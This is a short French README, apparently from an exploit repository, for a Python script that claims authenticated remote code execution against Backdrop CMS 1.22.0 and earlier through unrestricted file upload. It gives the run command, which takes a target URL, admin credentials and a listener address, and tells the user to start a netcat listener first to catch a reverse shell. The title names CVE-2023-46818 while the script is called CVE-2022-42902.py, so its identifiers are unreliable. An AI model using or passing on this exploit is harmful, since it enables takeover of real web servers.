
CVE-2023-46818 Exploit Python3 pour Backdrop CMS <= 1.22.0 Exécution de commande à distance authentifiée (RCE)
Ce script d'exploitation Python cible un téléchargement de fichier sans restriction dans Backdrop CMS pour exécuter du code à distance (RCE).
Version 1.22.0 et versions antérieures Remarque : Backdrop CMS conteste cette vulnérabilité et affirme que des permissions avancées sont nécessaires, c'est pourquoi elle pourrait encore exister dans les versions supérieures à 1.22.0. Je suppose qu'ils veulent dire qu'il faut d'abord disposer d'un accès administrateur. Néanmoins, il s'agit d'une vulnérabilité valide qui peut être exploitée pour prendre le contrôle complet du système.
python3 CVE-2022-42902.py <url_cible> <nom_utilisateur> <mot_de_passe> <ip_listener> <port_listener>
Important : Lancez votre listener avant d'exécuter le script :
nc -lvnp <port_listener>
